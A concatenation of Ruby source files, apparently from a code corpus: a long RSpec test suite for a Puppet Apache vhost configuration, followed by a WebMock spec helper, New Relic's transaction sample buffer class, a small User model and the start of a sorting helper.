}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerLoadShellEnvvars\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerRollingRestarts\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerResistDeploymentErrors\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerUser\ssandbox$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerGroup\ssandbox$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerFriendlyErrorPages\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMinInstances\s1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxInstances\s30$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxPreloaderIdleTime\s600$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerForceMaxConcurrentRequestsPerProcess\s10$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStartTimeout\s600$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerConcurrencyModel\sthread$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerThreadCount\s5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequests\s1000$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequestTime\s2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMemoryLimit\s64$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStatThrottleRate\s5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-file_footer').with(
content: %r{^PassengerPreStart\shttp://localhost/myapp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerHighPerformance\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerBufferUpload\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerBufferResponse\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerErrorOverride\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequestQueueSize\s10$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequestQueueTime\s2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStickySessions\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStickySessionsCookieName\s_nom_nom_nom$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAllowEncodedSlashes\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerDebugger\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerLveMinUid\s500$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCProviderMetadataURL\shttps:\/\/login.example.com\/\.well-known\/openid-configuration$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCClientID\stest$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCRedirectURI\shttps:\/\/login\.example.com\/redirect_uri$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCProviderTokenEndpointAuth\sclient_secret_basic$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCRemoteUserClaim\ssub$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCClientSecret\saae053a9-4abf-4824-8956-e94b2af335c8$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCCryptoPassphrase\s4ad1bb46-9979-450e-ae58-c696967df3cd$},
)
}
end
context 'vhost with multiple ip addresses' do
let :params do
{
'port' => '80',
'ip' => ['127.0.0.1', '::1'],
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost 127.0.0.1:80 \[::1\]:80>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:80') }
it { is_expected.to contain_concat__fragment('Listen [::1]:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:80') }
end
context 'vhost with multiple ports' do
let :params do
{
'port' => ['80', '8080'],
'ip' => '127.0.0.1',
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost 127.0.0.1:80 127.0.0.1:8080>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:80') }
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:8080') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:8080') }
end
context 'vhost with multiple ip addresses, multiple ports' do
let :params do
{
'port' => ['80', '8080'],
'ip' => ['127.0.0.1', '::1'],
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost 127.0.0.1:80 127.0.0.1:8080 \[::1\]:80 \[::1\]:8080>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:80') }
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:8080') }
it { is_expected.to contain_concat__fragment('Listen [::1]:80') }
it { is_expected.to contain_concat__fragment('Listen [::1]:8080') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:8080') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:8080') }
end
context 'vhost with ipv6 address' do
let :params do
{
'port' => '80',
'ip' => '::1',
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost \[::1\]:80>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen [::1]:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:80') }
end
context 'vhost with wildcard ip address' do
let :params do
{
'port' => '80',
'ip' => '*',
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost \*:80>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen *:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost *:80') }
end
context 'modsec_audit_log' do
let :params do
{
'docroot' => '/rspec/docroot',
'modsec_audit_log' => true,
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-security').with(
content: %r{^\s*SecAuditLog "\/var\/log\/#{apache_name}\/rspec\.example\.com_security\.log"$},
)
}
end
context 'modsec_audit_log_file' do
let :params do
{
'docroot' => '/rspec/docroot',
'modsec_audit_log_file' => 'foo.log',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-security').with(
content: %r{\s*SecAuditLog "\/var\/log\/#{apache_name}\/foo.log"$},
)
}
end
context 'set only aliases' do
let :params do
{
'docroot' => '/rspec/docroot',
'aliases' => [
{
'alias' => '/alias',
'path' => '/rspec/docroot',
},
],
}
end
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'proxy_pass_match' do
let :params do
{
'docroot' => '/rspec/docroot',
'proxy_pass_match' => [
{
'path' => '.*',
'url' => 'http://backend-a/',
'params' => { 'timeout' => 300 },
},
],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPassMatch .* http:\/\/backend-a\/ timeout=300},
).with_content(%r{## Proxy rules})
}
end
context 'proxy_dest_match' do
let :params do
{
'docroot' => '/rspec/docroot',
'proxy_dest_match' => '/',
}
end
it { is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(%r{## Proxy rules}) }
end
context 'not everything can be set together...' do
let :params do
{
'access_log_pipe' => '/dev/null',
'error_log_pipe' => '/dev/null',
'docroot' => '/var/www/foo',
'ensure' => 'absent',
'manage_docroot' => true,
'logroot' => '/tmp/logroot',
'logroot_ensure' => 'absent',
'directories' => [
{
'path' => '/var/www/files',
'provider' => 'files',
'allow' => ['from 127.0.0.1', 'from 127.0.0.2'],
'deny' => ['from 127.0.0.3', 'from 127.0.0.4'],
'satisfy' => 'any',
},
{
'path' => '/var/www/foo',
'provider' => 'files',
'allow' => 'from 127.0.0.5',
'deny' => 'from all',
'order' => 'deny,allow',
},
],
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_class('apache::mod::ssl') }
it { is_expected.not_to contain_class('apache::mod::mime') }
it { is_expected.not_to contain_class('apache::mod::vhost_alias') }
it { is_expected.not_to contain_class('apache::mod::wsgi') }
it { is_expected.not_to contain_class('apache::mod::passenger') }
it { is_expected.not_to contain_class('apache::mod::suexec') }
it { is_expected.not_to contain_class('apache::mod::rewrite') }
it { is_expected.not_to contain_class('apache::mod::alias') }
it { is_expected.not_to contain_class('apache::mod::proxy') }
it { is_expected.not_to contain_class('apache::mod::proxy_http') }
it { is_expected.not_to contain_class('apache::mod::headers') }
it { is_expected.to contain_file('/var/www/foo') }
it {
is_expected.to contain_file('/tmp/logroot').with('ensure' => 'absent')
}
it {
is_expected.to contain_concat('25-rspec.example.com.conf').with('ensure' => 'absent')
}
it { is_expected.to contain_concat__fragment('rspec.example.com-apache-header') }
it { is_expected.to contain_concat__fragment('rspec.example.com-docroot') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-aliases') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-itk') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-fallbackresource') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
# the following style is only present on Apache 2.2
# That is used in SLES 11, RHEL6, Amazon Linux
if (facts[:os]['family'] == 'RedHat' && facts[:os]['release']['major'].to_i < 7) ||
(facts[:os]['name'] == 'Amazon') ||
(facts[:os]['name'] == 'SLES' && facts[:os]['release']['major'].to_i < 12)
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Allow from 127\.0\.0\.1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Allow from 127\.0\.0\.2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Allow from 127\.0\.0\.5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Deny from 127\.0\.0\.3$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Deny from 127\.0\.0\.4$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Deny from all$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Satisfy any$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Order deny,allow$},
)
}
end
it { is_expected.not_to contain_concat__fragment('rspec.example.com-additional_includes') }
it { is_expected.to contain_concat__fragment('rspec.example.com-logging') }
it { is_expected.to contain_concat__fragment('rspec.example.com-serversignature') }
it { is_expected.to contain_concat__fragment('rspec.example.com-access_log') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-action') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-block') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-error_document') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-proxy') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-redirect') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-rewrite') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-scriptalias') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-serveralias') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-setenv') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-ssl') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-sslproxy') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-suphp') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-php_admin') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-header') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-requestheader') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-wsgi') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-custom_fragment') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-fastcgi') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-suexec') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-charsets') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-limits') }
it { is_expected.to contain_concat__fragment('rspec.example.com-file_footer') }
end
context 'wsgi_application_group should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_application_group' => '%{GLOBAL}',
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_daemon_process should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_daemon_process' => { 'foo' => { 'python-home' => '/usr' }, 'bar' => {} },
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_import_script on its own should not set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script' => '/var/www/demo.wsgi',
}
end
it { is_expected.not_to contain_class('apache::mod::wsgi') }
end
context 'wsgi_import_script_options on its own should not set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script_options' => {
'process-group' => 'wsgi',
'application-group' => '%{GLOBAL}',
},
}
end
it { is_expected.not_to contain_class('apache::mod::wsgi') }
end
context 'wsgi_import_script and wsgi_import_script_options should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script' => '/var/www/demo.wsgi',
'wsgi_import_script_options' => {
'process-group' => 'wsgi',
'application-group' => '%{GLOBAL}',
},
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_process_group should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_daemon_process' => 'wsgi',
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_script_aliases with non-empty aliases should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_script_aliases' => {
'/' => '/var/www/demo.wsgi',
},
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_script_aliases with empty aliases should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_script_aliases' => {},
}
end
it { is_expected.not_to contain_class('apache::mod::wsgi') }
end
context 'wsgi_pass_authorization should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_pass_authorization' => 'On',
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'when not setting nor managing the docroot' do
let :params do
{
'docroot' => false,
'manage_docroot' => false,
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-docroot') }
end
context 'ssl_proxyengine without ssl' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl' => false,
'ssl_proxyengine' => true,
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-ssl') }
it { is_expected.to contain_concat__fragment('rspec.example.com-sslproxy') }
end
context 'ssl_proxy_protocol without ssl_proxyengine' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl' => true,
'ssl_proxyengine' => false,
'ssl_proxy_protocol' => 'TLSv1.2',
}
end
it { is_expected.to compile }
it { is_expected.to contain_concat__fragment('rspec.example.com-ssl') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-sslproxy') }
end
describe 'access logs' do
context 'single log file' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'access_log_file' => 'my_log_file',
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog.*my_log_file" combined\s*$},
)
}
end
context 'single log file with environment' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'access_log_file' => 'my_log_file',
'access_log_env_var' => 'prod',
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog.*my_log_file" combined\s+env=prod$},
)
}
end
context 'multiple log files' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'access_logs' => [
{ 'file' => '/tmp/log1', 'env' => 'dev' },
{ 'file' => 'log2' },
{ 'syslog' => 'syslog', 'format' => '%h %l' },
],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog "\/tmp\/log1"\s+combined\s+env=dev$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog "\/var\/log\/#{apache_name}\/log2"\s+combined\s*$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog "syslog" "%h %l"\s*$},
)
}
end
end # access logs
describe 'error logs format' do
context 'on Apache 2.2' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'apache_version' => '2.2',
'error_log_format' => ['[%t] [%l] %7F: %E: [client\ %a] %M% ,\ referer\ %{Referer}i'],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging')
.without_content(%r{ErrorLogFormat})
}
end
context 'single log format directive as a string' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'apache_version' => '2.4',
'error_log_format' => ['[%t] [%l] %7F: %E: [client\ %a] %M% ,\ referer\ %{Referer}i'],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat "\[%t\] \[%l\] %7F: %E: \[client\\ %a\] %M% ,\\ referer\\ %\{Referer\}i"$},
)
}
end
context 'multiple log format directives' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'apache_version' => '2.4',
'error_log_format' => [
'[%{uc}t] [%-m:%-l] [R:%L] [C:%{C}L] %7F: %E: %M',
{ '[%{uc}t] [R:%L] Request %k on C:%{c}L pid:%P tid:%T' => 'request' },
{ "[%{uc}t] [R:%L] UA:'%+{User-Agent}i'" => 'request' },
{ "[%{uc}t] [R:%L] Referer:'%+{Referer}i'" => 'request' },
{ '[%{uc}t] [C:%{c}L] local\ %a remote\ %A' => 'connection' },
],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat "\[%\{uc\}t\] \[%-m:%-l\] \[R:%L\] \[C:%\{C\}L\] %7F: %E: %M"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat request "\[%\{uc\}t\] \[R:%L\] Request %k on C:%\{c\}L pid:%P tid:%T"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat request "\[%\{uc\}t\] \[R:%L\] UA:'%\+\{User-Agent\}i'"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat request "\[%\{uc\}t\] \[R:%L\] Referer:'%\+\{Referer\}i'"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat connection "\[%\{uc\}t\] \[C:%\{c\}L\] local\\ %a remote\\ %A"$},
)
}
end
end # error logs format
describe 'validation' do
context 'bad ensure' do
let :params do
{
'docroot' => '/rspec/docroot',
'ensure' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad suphp_engine' do
let :params do
{
'docroot' => '/rspec/docroot',
'suphp_engine' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad ip_based' do
let :params do
{
'docroot' => '/rspec/docroot',
'ip_based' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad access_log' do
let :params do
{
'docroot' => '/rspec/docroot',
'access_log' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad error_log' do
let :params do
{
'docroot' => '/rspec/docroot',
'error_log' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad_ssl' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad default_vhost' do
let :params do
{
'docroot' => '/rspec/docroot',
'default_vhost' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad ssl_proxyengine' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl_proxyengine' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad rewrites' do
let :params do
{
'docroot' => '/rspec/docroot',
'rewrites' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad rewrites 2' do
let :params do
{
'docroot' => '/rspec/docroot',
'rewrites' => ['bogus'],
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'empty rewrites' do
let :params do
{
'docroot' => '/rspec/docroot',
'rewrites' => [],
}
end
it { is_expected.to compile }
end
context 'bad suexec_user_group' do
let :params do
{
'docroot' => '/rspec/docroot',
'suexec_user_group' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad wsgi_script_alias' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_script_alias' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad wsgi_daemon_process_options' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_daemon_process_options' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad wsgi_import_script_alias' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script_alias' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad itk' do
let :params do
{
'docroot' => '/rspec/docroot',
'itk' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad logroot_ensure' do
let :params do
{
'docroot' => '/rspec/docroot',
'log_level' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad log_level' do
let :params do
{
'docroot' => '/rspec/docroot',
'log_level' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad error_log_format flag' do
let :params do
{
'docroot' => '/rspec/docroot',
'error_log_format' => [
{ 'some format' => 'bogus' },
],
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'access_log_file and access_log_pipe' do
let :params do
{
'docroot' => '/rspec/docroot',
'access_log_file' => 'bogus',
'access_log_pipe' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'error_log_file and error_log_pipe' do
let :params do
{
'docroot' => '/rspec/docroot',
'error_log_file' => 'bogus',
'error_log_pipe' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad fallbackresource' do
let :params do
{
'docroot' => '/rspec/docroot',
'fallbackresource' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad custom_fragment' do
let :params do
{
'docroot' => '/rspec/docroot',
'custom_fragment' => true,
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad access_logs' do
let :params do
{
'docroot' => '/rspec/docroot',
'access_logs' => '/var/log/somewhere',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'default of require all granted' do
let :params do
{
'docroot' => '/var/www/foo',
'directories' => [
{
'path' => '/var/www/foo/files',
'provider' => 'files',
},
],
}
end
it { is_expected.to compile }
it { is_expected.to contain_concat('25-rspec.example.com.conf') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
# this works only with apache 2.4 and newer
if (facts[:os]['family'] == 'RedHat' && facts[:os]['release']['major'].to_i > 6) ||
(facts[:os]['name'] == 'SLES' && facts[:os]['release']['major'].to_i > 11)
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all granted$},
)
}
end
end
context 'require unmanaged' do
let :params do
{
'docroot' => '/var/www/foo',
'directories' => [
{
'path' => '/var/www/foo',
'require' => 'unmanaged',
},
],
}
end
it { is_expected.to compile }
it { is_expected.to contain_concat('25-rspec.example.com.conf') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
it {
is_expected.not_to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Require all granted$},
)
}
end
describe 'redirectmatch_*' do
let :dparams do
{
docroot: '/rspec/docroot',
port: '84',
}
end
context 'status' do
let(:params) { dparams.merge(redirectmatch_status: '404') }
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'dest' do
let(:params) { dparams.merge(redirectmatch_dest: 'http://other.example.com$1.jpg') }
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'regexp' do
let(:params) { dparams.merge(redirectmatch_regexp: "(.*)\.gif$") }
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'none' do
let(:params) { dparams }
it { is_expected.not_to contain_class('apache::mod::alias') }
end
end
end
end
end
end
end
| 41.904087 | 156 | 0.466841 |
ed4fe6d6aa5f282885c59dbe7df1f50f0e44c7c4
| 77 |
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: true)
| 19.25 | 51 | 0.831169 |
872a660c5040a9c9e94cdf03e5bd1239e20e1e56
| 2,924 |
# encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/newrelic-ruby-agent/blob/main/LICENSE for complete details.
module NewRelic
module Agent
class Transaction
class TransactionSampleBuffer
attr_reader :samples
SINGLE_BUFFER_MAX = 20
NO_SAMPLES = [].freeze
def initialize
@samples = []
end
def enabled?
true
end
def reset!
@samples = []
end
def harvest_samples
@samples
ensure
reset!
end
def allow_sample?(sample)
true
end
def store(sample)
return unless enabled?
if allow_sample?(sample)
add_sample(sample)
truncate_samples_if_needed
end
end
def store_previous(previous_samples)
return unless enabled?
previous_samples.each do |sample|
add_sample(sample) if allow_sample?(sample)
end
truncate_samples_if_needed
end
def truncate_samples_if_needed
truncate_samples if full?
end
def full?
@samples.length >= max_capacity
end
# Capacity is the desired number of samples a buffer will hold. This
# can be user dictated via config if a feature wants.
#
# This value will be forcibly capped by the max_capacity
def capacity
raise NotImplementedError.new("TransactionSampleBuffer subclasses must provide a capacity override")
end
# Apply hard upper limit to the capacity to prevent users from
# consuming too much memory buffering TT's.
#
# A typical buffer should NOT override this method (although we do for
# odd things like dev-mode)
def max_capacity
capacity > SINGLE_BUFFER_MAX ? SINGLE_BUFFER_MAX : capacity
end
# Our default truncation strategy is to keep max_capacity
# worth of the longest samples. Override this method for alternate
# behavior.
#
# This doesn't use the more convenient #last and #sort_by to avoid
# additional array allocations (and abundant alliteration)
def truncate_samples
@samples.sort! { |a, b| a.duration <=> b.duration }
@samples.slice!(0..-(max_capacity + 1))
end
# When pushing a scope different sample buffers potentially want to
# know about what's happening to annotate the incoming nodes
def visit_node(*)
# no-op
end
private
# If a buffer needs to modify an added sample, override this method.
# Bounds checking, allowing samples and truncation belongs elsewhere.
def add_sample(sample)
@samples << sample
end
end
end
end
end
| 27.847619 | 110 | 0.604993 |
d58e6c987e228e55e1738dad4d2df5d0ddf8f154
| 413 |
class User < ActiveRecord::Base
has_secure_password
validates :username, :password, presence: true
# ^ helper method built into sinatra that allows setting conditions for bad data being persisted to the database from controller actions.
validates :username, uniqueness: true #eliminates need for controller action validation on having unique usernames for database and users
has_many :cats
end
| 59 | 141 | 0.786925 |
5dfa8b124c624134b0ca98ab27cb03ec793d90d0
| 1,221 |
# frozen_string_literal: true
# Helper class for column sorting in Pagination.
#
# Examples:
#
# @direction = SortDirection.new(:asc)
